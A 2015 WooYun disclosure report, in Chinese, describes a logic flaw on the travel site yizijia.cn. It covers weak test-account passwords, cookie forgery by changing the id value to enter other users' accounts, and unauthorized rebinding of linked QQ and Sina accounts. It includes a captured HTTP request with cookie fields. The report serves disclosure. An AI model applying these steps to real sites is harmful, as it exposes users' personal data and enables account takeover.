当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112491

漏洞标题:易自驾存在逻辑漏洞可获取用户敏感信息

相关厂商:易自驾

漏洞作者: 路人甲

提交时间:2015-05-20 14:56

修复时间:2015-07-04 14:58

公开时间:2015-07-04 14:58

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

最好的全球自驾旅游服务网站-易自驾,中旅总社出境自驾游唯一战略合作伙伴。如题

详细说明:

首先存在弱口令测试账户:1/*,2/******.
登陆测试账户,cookie插件显示cookie为hostonly,存在cookie伪造访问其他账号

原因.JPG


注册一个账户,获取大致的用户id范围,登陆后修改id进入其他账户,造成用户资料泄露(邮箱,地址,旅游计划等)

1.JPG


2.JPG


3.JPG


进一步,发现密码修改未授权,但是还有个账户绑定,可解绑当前用户的qq,新浪账号,进而绑定其他qq,新浪账号。这不是变相的密码修改吗?

捕获.JPG


绑定.JPG

漏洞证明:

Remote Address:210.14.156.104:81
Request URL:http://www.yizijia.cn:81/me.html
Request Method:GET
Status Code:200 OK
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip, deflate, sdch
Accept-Language:zh-CN,zh;q=0.8
Connection:keep-alive
Cookie:
email=******U%2fdkVsm9Lz3B2NbGK;
id=2;
loginUserType=2; Oatuh2=********AwMzQwNzQzPC9BcHBJRD48QXBwS2V5PmZhMjI3ZjVlY2E2NTMxNjJjNzBlOWNiNGY0ZTI5OTU1PC9BcHBLZXk+PFR5cGU+MTwvVHlwZT48SXNCPjE8L0lzQj48L09BdHVoMj4=; preUrl=http://www.yizijia.cn/MyInformation/6.html?lf=1; state=0bbdfbc79c2e4dcaaf8147f9a719e8c2; username=****; userphotourl=../images/ccccc.jpg; ASP.NET_SessionId=c2w3nwxzi2xiw********; userlevel=1; Hm_lvt_b798801390d54a6488ce92fd554717bc=1430***438,14309**596,1430***574,143***4684; Hm_lpvt_b798801390d54a6488ce92fd554717bc=143****706
Host:www.yizijia.cn:81
Referer:http://www.yizijia.cn:81/me.html
User-Agent:**


cookie中存在问题的有id,loginUserType。其中UserType未测试是否能提升权限。

原因.JPG


000000.JPG

修复方案:

cookie。。。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论